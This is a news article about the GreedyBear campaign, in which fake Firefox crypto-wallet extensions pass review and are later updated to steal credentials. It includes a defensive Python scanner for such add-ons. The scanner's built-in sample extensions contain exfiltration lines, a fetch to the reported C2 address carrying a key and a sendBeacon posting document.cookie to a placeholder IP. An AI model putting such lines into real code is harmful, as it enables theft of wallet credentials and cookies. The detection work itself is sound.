A campaign tracked as GreedyBear has come to light, involving more than 150 malicious Firefox extensions that impersonate popular cryptocurrency wallets. According to cybersecurity firm Koi Security, the attackers have already stolen more than $1 million in digital assets.
The fake add-ons, identified by Koi Security researcher Tuval Admoni, mimic well-known wallets such as MetaMask, TronLink, Exodus, and Rabby Wallet in order to harvest users’ wallet credentials. What sets this operation apart is an evasion technique the researchers call “Extension Hollowing”: the operators get benign-looking extensions through Mozilla’s add-on review and only later push updates that carry the malicious code.
“Rather than trying to sneak malicious extensions past initial reviews, they build legitimate-seeming extension portfolios first, then weaponize them later when nobody’s watching,” Admoni explained in a recent report.
The threat actors first upload harmless extensions with no real functionality so that they pass review. They then flood the listings with fake positive reviews to build credibility before shipping an update that adds the malicious behavior. The weaponized add-ons capture wallet credentials and the victim’s IP address and send the stolen data to a command-and-control (C2) server at 185.208.156[.]66.
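The technique above leaves two things a defender can check for: the indicators in the shipped add-on, and the delta between the benign version that passed review and the update that followed it. The script below is an added example (not Koi Security’s tooling and not code from the report) that scans Firefox XPI files for the C2 address quoted on this page, for hard-coded IP-literal URLs, and for wallet-brand impersonation in the manifest, and then diffs two versions of the same add-on for newly added permissions and indicators. The profile layout (`<profile>/extensions/*.xpi`), the IP-literal heuristic and the sample XPIs are assumptions made for the example.

```python
"""Triage Firefox add-ons for the GreedyBear-style indicators described above.

Added example; not Koi Security's tooling. The two sample XPIs built at the
bottom are constructed in memory so the script runs offline.
"""
import io
import json
import re
import zipfile
from pathlib import Path

# C2 address reported by Koi Security (shown defanged in the article).
C2_IP = "185.208.156.66"
# Wallet brands the article says the fake add-ons impersonate.
IMPERSONATED = ("metamask", "tronlink", "exodus", "rabby")
# Heuristic (assumption): a wallet add-on should not talk to a bare IP-literal URL.
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")
SCRIPT_EXT = (".js", ".mjs", ".html", ".json")


def scan_xpi(data: bytes) -> dict:
    """Return name, declared permissions and indicator hits for one XPI (a zip)."""
    findings = {"name": "", "permissions": [], "hits": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        manifest = json.loads(z.read("manifest.json"))
        findings["name"] = manifest.get("name", "")
        # MV2 keeps host access in "permissions"; MV3 moves it to "host_permissions".
        findings["permissions"] = list(manifest.get("permissions", [])) + list(
            manifest.get("host_permissions", []))
        if any(brand in findings["name"].lower() for brand in IMPERSONATED):
            findings["hits"].append(("manifest.json", "impersonates-wallet-brand"))
        for member in z.namelist():
            if not member.endswith(SCRIPT_EXT):
                continue
            text = z.read(member).decode("utf-8", "replace")
            if C2_IP in text:
                findings["hits"].append((member, "known-c2-ip"))
            for ip in IP_URL.findall(text):
                if ip != C2_IP:  # already reported above
                    findings["hits"].append((member, f"literal-ip-url:{ip}"))
    return findings


def hollowing_delta(old_xpi: bytes, new_xpi: bytes) -> dict:
    """What an update added relative to the version that passed review.

    Extension hollowing looks like a benign v1 followed by a v2 that suddenly
    asks for broad access or contacts a hard-coded server.
    """
    old, new = scan_xpi(old_xpi), scan_xpi(new_xpi)
    return {
        "new_permissions": sorted(set(new["permissions"]) - set(old["permissions"])),
        "new_hits": sorted(set(new["hits"]) - set(old["hits"])),
    }


def scan_profile(profile_dir: str) -> list:
    """Scan every installed XPI in a Firefox profile (location assumed: extensions/)."""
    xpis = Path(profile_dir, "extensions").glob("*.xpi")
    return [(p.name, scan_xpi(p.read_bytes())) for p in xpis]


def build_xpi(manifest: dict, files: dict) -> bytes:
    """Build an in-memory XPI; used only to construct the samples below."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps(manifest))
        for name, body in files.items():
            z.writestr(name, body)
    return buf.getvalue()


# Constructed samples: v1 is the hollow shell that passed review, v2 the update.
# 203.0.113.9 is a documentation-range address, not a real indicator.
BENIGN_V1 = build_xpi(
    {"name": "Rabby Wallet Helper", "version": "1.0", "permissions": ["storage"]},
    {"background.js": "console.log('ready');"})
HOLLOWED_V2 = build_xpi(
    {"name": "Rabby Wallet Helper", "version": "1.1",
     "permissions": ["storage", "tabs", "<all_urls>"]},
    {"background.js": "fetch('http://185.208.156.66/c?k=' + encodeURIComponent(key));",
     "ui.js": "navigator.sendBeacon('http://203.0.113.9/log', document.cookie);"})

if __name__ == "__main__":
    print(json.dumps(scan_xpi(HOLLOWED_V2), indent=2))
    print(json.dumps(hollowing_delta(BENIGN_V1, HOLLOWED_V2), indent=2))
```

Run it against a real profile with `scan_profile("~/.mozilla/firefox/<profile>")` after expanding the path; any add-on that names a wallet brand while pulling in `<all_urls>` or an IP-literal endpoint is worth pulling apart by hand, and the version delta is what tells you whether the listing was hollowed rather than malicious from day one.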
This campaign appears to be an evolution of an earlier effort called Foxy Wallet, which also targeted Firefox users with the same approach. The scope has expanded significantly, however: the operators now distribute malware across several channels, including scam sites, browser extensions, and malicious executable files often shared via Russian websites offering pirated software.
In addition to fake wallets, attackers have also launched phishing websites posing as crypto tools like wallet repair utilities to further deceive users and steal sensitive data.
Koi Security also noted signs that AI-powered tools may have been used to create the malware and supporting infrastructure, enabling the operation to scale rapidly.
Meanwhile, SentinelOne uncovered a parallel crypto fraud operation where Ethereum drainers are disguised as trading bots, promoted through AI-generated YouTube videos. Victims are lured into deploying malicious smart contracts, ultimately redirecting funds to the attacker’s wallet.
As AI continues to be misused for creating fake content and scaling cybercrime, experts warn of increasingly complex and deceptive attacks targeting the growing crypto community.